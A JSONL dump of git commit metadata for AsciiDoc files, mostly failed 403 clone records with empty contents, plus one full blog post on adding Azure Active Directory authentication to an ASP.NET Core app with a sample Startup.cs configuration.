<4bf4c125525b8623ac45dfd7774cbf531df19085@apache.org>\n","repos":"cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu","old_file":"docs\/prior_release_notes.adoc","new_file":"docs\/prior_release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"59f8e51898065c40892c1f2b780939dca9b449d3","subject":"Update 2016-12-18-About-Me.adoc","message":"Update 2016-12-18-About-Me.adoc","repos":"chowwin\/chowwin.github.io,chowwin\/chowwin.github.io,chowwin\/chowwin.github.io,chowwin\/chowwin.github.io","old_file":"_posts\/2016-12-18-About-Me.adoc","new_file":"_posts\/2016-12-18-About-Me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chowwin\/chowwin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"533d76056063f442faabd25c0df0f44bcb93a174","subject":"Add ascii doc file","message":"Add ascii doc file","repos":"stefanpernes\/DARIAH-DKPro-Wrapper","old_file":"documentation\/user-guide.adoc","new_file":"documentation\/user-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stefanpernes\/DARIAH-DKPro-Wrapper.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a5cf13b177b5b13dda937b63b516a372e379d64e","subject":"more minor changes","message":"more minor 
changes\n","repos":"EMBL-EBI-SUBS\/subs,EMBL-EBI-SUBS\/subs","old_file":"subs-api\/src\/main\/resources\/docs\/how_to_submit_data_programatically.adoc","new_file":"subs-api\/src\/main\/resources\/docs\/how_to_submit_data_programatically.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMBL-EBI-SUBS\/subs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c4ab03761938bd23aff586b16aa40a2041cecdd5","subject":"Update 2017-03-25-Welcome.adoc","message":"Update 2017-03-25-Welcome.adoc","repos":"ronanki\/ronanki.github.io,ronanki\/ronanki.github.io,ronanki\/ronanki.github.io,ronanki\/ronanki.github.io","old_file":"_posts\/2017-03-25-Welcome.adoc","new_file":"_posts\/2017-03-25-Welcome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ronanki\/ronanki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"380e739cf1c55cf8d48c369a0bec839414ad44e8","subject":"Update 2017-10-09-Azure-7.adoc","message":"Update 2017-10-09-Azure-7.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-09-Azure-7.adoc","new_file":"_posts\/2017-10-09-Azure-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"408f7c717517e8b487f367d2cb31dfcc092537d2","subject":"Update 2018-01-16-Azure-9.adoc","message":"Update 2018-01-16-Azure-9.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-16-Azure-9.adoc","new_file":"_posts\/2018-01-16-Azure-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c3ccfbc334138b6d496f410a1735d406de795c6","subject":"Update 2015-05-18-uGUI.adoc","message":"Update 2015-05-18-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-18-uGUI.adoc","new_file":"_posts\/2015-05-18-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e12df9383cc81d7d4b0e875d3f4f192b0c39bddc","subject":"Update 2016-10-23-Test.adoc","message":"Update 2016-10-23-Test.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2016-10-23-Test.adoc","new_file":"_posts\/2016-10-23-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d289ec376c5ef4ba035ef5dae34c07c5322e797","subject":"Hawkular Metrics 0.12.0 - Release","message":"Hawkular Metrics 0.12.0 - 
Release\n","repos":"hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/02\/02\/hawkular-metrics-0.12.0.Final-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/02\/02\/hawkular-metrics-0.12.0.Final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f35fede0974b260b5c9ab62292f35c36d956012c","subject":"Update 1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","message":"Update 1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","new_file":"_posts\/1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35d9e8fa210b96fbdbf79f795800e67927ab55dd","subject":"y2b create post Ninja Gaiden 3 Collector's Edition Unboxing","message":"y2b create post Ninja Gaiden 3 Collector's Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-04-06-Ninja-Gaiden-3-Collectors-Edition-Unboxing.adoc","new_file":"_posts\/2012-04-06-Ninja-Gaiden-3-Collectors-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"908c3cf934d22ee4b64dac8cfca8ae6ccac22a84","subject":"Update 2016-09-27-Kale-Spinach-Salad-with-Raspberry-Dressing.adoc","message":"Update 2016-09-27-Kale-Spinach-Salad-with-Raspberry-Dressing.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2016-09-27-Kale-Spinach-Salad-with-Raspberry-Dressing.adoc","new_file":"_posts\/2016-09-27-Kale-Spinach-Salad-with-Raspberry-Dressing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zestyroxy\/zestyroxy.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc962911d563510976073332d6d18e7044195e5e","subject":"Update 2016-11-07-Monday.adoc","message":"Update 2016-11-07-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-Monday.adoc","new_file":"_posts\/2016-11-07-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1778f6967662d9126607354ca24b400e6895b19b","subject":"CAMEL-13435 - Docs","message":"CAMEL-13435 - Docs\n","repos":"pmoerenhout\/camel,ullgren\/camel,DariusX\/camel,nikhilvibhav\/camel,apache\/camel,DariusX\/camel,CodeSmell\/camel,nikhilvibhav\/camel,ullgren\/camel,tdiesler\/camel,objectiser\/camel,pmoerenhout\/camel,cunningt\/camel,objectiser\/camel,alvinkwekel\/camel,cunningt\/camel,CodeSmell\/camel,christophd\/camel,cunningt\/camel,CodeSmell\/camel,cunningt\/camel,mcollovati\/camel,DariusX\/camel,adessaigne\/camel,mcollovati\/camel,tdiesler\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,tadayosi\/camel,nicolaferraro\/camel,zregvart\/camel,alvinkwekel\/camel,christophd\/camel,adessaigne\/camel,nikhilvibhav\/camel,objectiser\/camel,adessaigne\/camel,alvinkwekel\/camel,apache\/camel,zregvart\/camel,gnodet\/camel,nicolaferraro\/camel,apache\/camel,zregvart\/camel,tadayosi\/camel,tdiesler\/camel,apache\/camel,pmoerenhout\/camel,christophd\/camel,mcollovati\/camel,gnodet\/camel,pmoerenhout\/camel,CodeSmell\/camel,alvinkwekel\/camel,christophd\/camel,christophd\/camel,tadayosi\/camel,apache\/camel,zregvart\/camel,nicolaferraro\/camel,apache\/camel,tadayosi\/camel,ullgren\/camel,ullgren\/camel,mcollovati\/camel,cunningt\/camel,tdiesler\/camel,adessaigne\/camel,tdiesler\/camel,DariusX\/camel,adessaigne\/camel,pax95\/camel,objectiser\/camel,tadayosi\/camel,pmoerenhout\/camel,pax95\/camel,adessaigne\/camel,pax95\/camel,tdiesler\/camel,pax95\/camel,tadayosi\/camel,cunningt\/camel,nicolaferraro\/camel,gnodet\/camel,pax95\/camel,gnodet\/camel,pax95\/camel,gnodet\/camel,christophd\/camel","old_file":"components\/camel-aws-translate\/src\/main\/docs\/aws-translate-component.adoc","new_file":"components\/camel-aws-translate\/src\/main\/docs\/aws-translate-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f32594c1f2ccd16f0c6e9f29fc5dfc648123d02f","subject":"create post Is The LG V30 The Most Underrated Smartphone?","message":"create post Is The LG V30 The Most Underrated Smartphone?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-Is-The-LG-V30-The-Most-Underrated-Smartphone?.adoc","new_file":"_posts\/2018-02-26-Is-The-LG-V30-The-Most-Underrated-Smartphone?.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3ac37fec15d88d9611e4cbb616a3cb42b2596c4","subject":"v2.26 release notes","message":"v2.26 release notes\n\nSigned-off-by: Hanoh Haim 
<1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"doc\/release_notes.asciidoc","new_file":"doc\/release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"af05199a03a3fba2eea4263b83bd7c31e59b3ac7","subject":"Add README.adoc","message":"Add README.adoc\n","repos":"jarryDk\/MineCraft,jarryDk\/MineCraft","old_file":"android-minecraft\/README.adoc","new_file":"android-minecraft\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarryDk\/MineCraft.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a1d6b92763d150a45f35ae9633a659cf1ddf8002","subject":"Update 2017-05-31-Implementing-Authentication-in-an-ASPNET-Core-application-using-Azure-Active-Directory.adoc","message":"Update 2017-05-31-Implementing-Authentication-in-an-ASPNET-Core-application-using-Azure-Active-Directory.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2017-05-31-Implementing-Authentication-in-an-ASPNET-Core-application-using-Azure-Active-Directory.adoc","new_file":"_posts\/2017-05-31-Implementing-Authentication-in-an-ASPNET-Core-application-using-Azure-Active-Directory.adoc","new_contents":"= Implementing Authentication in an ASP.NET Core application using Azure Active Directory\n:hp-tags: asp.net\n:hp-alt-title: Implementing Authentication in an ASP.NET Core application using Azure Active Directory\n:published_at: 2017-05-31\n\nImplementing authentication in an ASP.NET Core application using Azure Active Directory.\n\nIn an on-premises world there are different ways of implementing authentication; here are some of the scenarios:\n\n\u2022\tIn a Windows world you typically host your site on a web server like IIS and enable Windows authentication schemes such as Kerberos or NTLM for in-house applications (intranet sites). The Windows security subsystem (LSASS) talks to the on-premises Active Directory (domain controllers) to implement these authentication protocols.\n\u2022\tThe above mechanism requires users to be present in Active Directory; if you need to sign in with your own custom users, the other approach is the ASP.NET membership provider, which can create new users and store them in a database such as SQL Server. That way, any non-domain user can use the site and its services.\n\n\nImagine you access ten different public sites and have ten different usernames and passwords to remember. It\u2019s a tedious job to remember them all, and if you happen to use the same password across all sites and that password gets hacked, you are in trouble!\n\nToday Social Login is a buzzword, and it is completely different from the traditional authentication process: it integrates applications with third-party providers like Facebook, Twitter, and Google to provide a single sign-on experience.\n\nAzure Active Directory (AAD) provides a number of services, and one of them is identity management. 
The AAD provides both options: you can authenticate a user against directory (domain) accounts, and you can easily integrate your application with social login providers (Facebook, Google, etc.).\n\nTo begin with, you need to create an Azure Active Directory B2C (Business to Consumer) tenant, which is basically the cloud service that implements the OpenID Connect authentication protocol on top of OAuth 2.0. In this example we will use Visual Studio 2017 to quickly create an ASP.NET Core application and enable Azure Active Directory based authentication.\n\nStep 1:\nCreate the Azure Active Directory B2C tenant using the steps outlined here: https:\/\/docs.microsoft.com\/en-us\/azure\/active-directory-b2c\/active-directory-b2c-get-started\n\nStep 2:\n\nCreate an ASP.NET Core project targeting the .NET Framework.\n\n \nimage::auth1.png[]\n\n\nNow select Web Application and click on Change Authentication.\n\nimage::auth2.png[]\n\n\nNow select Work or School Accounts. (Make sure you log in to Visual Studio with the same account you use for the Azure portal.) You will see the B2C tenant that you created in Step 1 listed here (in the Domain text box). Now press OK.\n\nimage::auth3.png[]\n \n\n\n\nHere are some of the things that happen to your MVC project behind the scenes:\n\n1.\tIt adds references to a couple of NuGet packages, \u201cMicrosoft.AspNetCore.Authentication.Cookies\u201d and \u201cMicrosoft.AspNetCore.Authentication.OpenIdConnect\u201d.\n2.\tThe ConfigureServices and Configure methods inside Startup.cs are updated to inject the middleware that performs OpenID Connect authentication (a sketch of this wiring appears at the end of this post).\n\nimage::auth4.png[]\n\nimage::auth5.png[]\n \n\n3.\tThese methods read settings such as ClientId and TenantId, which are also written to the appsettings.json file.\n\nimage::auth6.png[]\n \n\n4.\tThe ClientId is the unique ID generated for each application that you register under that tenant. You can also create it manually by going to the Azure portal and opening the application settings for that tenant.\n5.\tThe HomeController is decorated with the Authorize attribute, which will force the user to authenticate.\n \nimage::auth7.png[]\n\nNow, to test the authentication, create a user in the Azure portal for the specific tenant that you created. Here is a snapshot of that flow:\n\nimage::auth8.png[]\n\n\nNow go ahead and launch the default page of your site; it should take you to the login page, where you can enter the newly created username and password.
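\n\nAs a quick reference for item 2 above, here is a minimal sketch of what the scaffolded OpenID Connect wiring in Startup.cs looks like. This is only an approximation of the code shown in the screenshots, written against the ASP.NET Core 1.x middleware model that Visual Studio 2017 scaffolded at the time; in particular, the configuration key names are assumptions, so verify them against your own generated project and its appsettings.json.\n\n[source,csharp]\n----\nusing Microsoft.AspNetCore.Authentication.Cookies;\nusing Microsoft.AspNetCore.Builder;\nusing Microsoft.AspNetCore.Hosting;\nusing Microsoft.Extensions.DependencyInjection;\n\n\/\/ Excerpt from Startup.cs. Configuration is the IConfigurationRoot\n\/\/ that the Startup constructor builds from appsettings.json.\npublic void ConfigureServices(IServiceCollection services)\n{\n    \/\/ The OpenID Connect handler signs the authenticated user in to\n    \/\/ this cookie scheme, which then tracks the session.\n    services.AddAuthentication(\n        options => options.SignInScheme = CookieAuthenticationDefaults.AuthenticationScheme);\n    services.AddMvc();\n}\n\npublic void Configure(IApplicationBuilder app, IHostingEnvironment env)\n{\n    app.UseStaticFiles();\n    app.UseCookieAuthentication(new CookieAuthenticationOptions());\n\n    \/\/ Challenges unauthenticated requests and redirects them to the\n    \/\/ Azure AD sign-in page. The key names below are illustrative.\n    app.UseOpenIdConnectAuthentication(new OpenIdConnectOptions\n    {\n        ClientId = Configuration[\"Authentication:AzureAd:ClientId\"],\n        Authority = Configuration[\"Authentication:AzureAd:AADInstance\"]\n                    + Configuration[\"Authentication:AzureAd:TenantId\"],\n        CallbackPath = Configuration[\"Authentication:AzureAd:CallbackPath\"]\n    });\n\n    app.UseMvc(routes =>\n    {\n        routes.MapRoute(\n            name: \"default\",\n            template: \"{controller=Home}\/{action=Index}\/{id?}\");\n    });\n}\n----\n\nWith this wiring in place, hitting any action guarded by the Authorize attribute triggers a redirect to the Azure AD login page, and on return the cookie middleware establishes the local session.\n\n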
Once the user is authenticated you should see the Home\/Index page loading with the username listed.\n\n","old_contents":"","returncode":1,"stderr":"error: pathspec '_posts\/2017-05-31-Implementing-Authentication-in-an-ASPNET-Core-application-using-Azure-Active-Directory.adoc' did not match any file(s) known to git\n","license":"mit","lang":"AsciiDoc"} {"commit":"be8444cf4ebd1fadd5f706c64e0c108707c0cb60","subject":"Update 2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","message":"Update 2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","new_file":"_posts\/2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8611c882f59ce3a8cbfa5efabe913dcd147b540","subject":"Update 2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","message":"Update 2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","new_file":"_posts\/2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84cbb3e60e12c413eb20d48b5508f70013f9b637","subject":"Update Quick Start Guide_RestcommONE Cloud.adoc","message":"Update Quick Start Guide_RestcommONE Cloud.adoc","repos":"RestComm\/documentation,RestComm\/documentation","old_file":"website\/src\/main\/asciidoc\/restcommone_cloud\/Quick Start Guide_RestcommONE Cloud.adoc","new_file":"website\/src\/main\/asciidoc\/restcommone_cloud\/Quick Start Guide_RestcommONE Cloud.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RestComm\/documentation.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"cffcb1f15222647cccef4495679ef0c1d09e59c1","subject":"Update 2015-03-14-Using-raw-HTML-in-AsciiDoc.adoc","message":"Update 2015-03-14-Using-raw-HTML-in-AsciiDoc.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-03-14-Using-raw-HTML-in-AsciiDoc.adoc","new_file":"_posts\/2015-03-14-Using-raw-HTML-in-AsciiDoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da647154fabad3de12e60c43bcd9fc6463cf737f","subject":"Update 2016-04-03-etat-limite-borderline-tpl.adoc","message":"Update 
2016-04-03-etat-limite-borderline-tpl.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-borderline-tpl.adoc","new_file":"_posts\/2016-04-03-etat-limite-borderline-tpl.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ca363cdfc1a19d3793467d000e72afb66bf0f53","subject":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","message":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dae52be66291b74a654faad4c5e265833761494b","subject":"doc: add cookbook link","message":"doc: add cookbook link\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"doc\/trex_index.asciidoc","new_file":"doc\/trex_index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7ec173f7bda03f9bd09d3945b3e2fbb4f43b83c4","subject":"Tweak SLES 12 source install instructions","message":"Tweak SLES 12 source install instructions\n\nChange-Id: Idda4bc0ade6ce8579a3d8acccdd450be2f07030f\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/2225\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Kudu Jenkins\n","repos":"helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ebfed46abf066dfc9003c1a93f19a984151b0162","subject":"Update 2015-09-25-Blog-simplified.adoc","message":"Update 
2015-09-25-Blog-simplified.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-25-Blog-simplified.adoc","new_file":"_posts\/2015-09-25-Blog-simplified.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52abf425d0d9d6c14d11e24ad03b9c7be59115ca","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8feda1c991e539744897ded59f49f7fae6cd7ccc","subject":"Update 2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","message":"Update 2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","new_file":"_posts\/2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eea036b0eb2051f55e10f527853f1e62b542566a","subject":"Update 2015-05-21-My-title.adoc","message":"Update 2015-05-21-My-title.adoc","repos":"harquail\/harquail.github.io,harquail\/harquail.github.io,harquail\/harquail.github.io","old_file":"_posts\/2015-05-21-My-title.adoc","new_file":"_posts\/2015-05-21-My-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harquail\/harquail.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 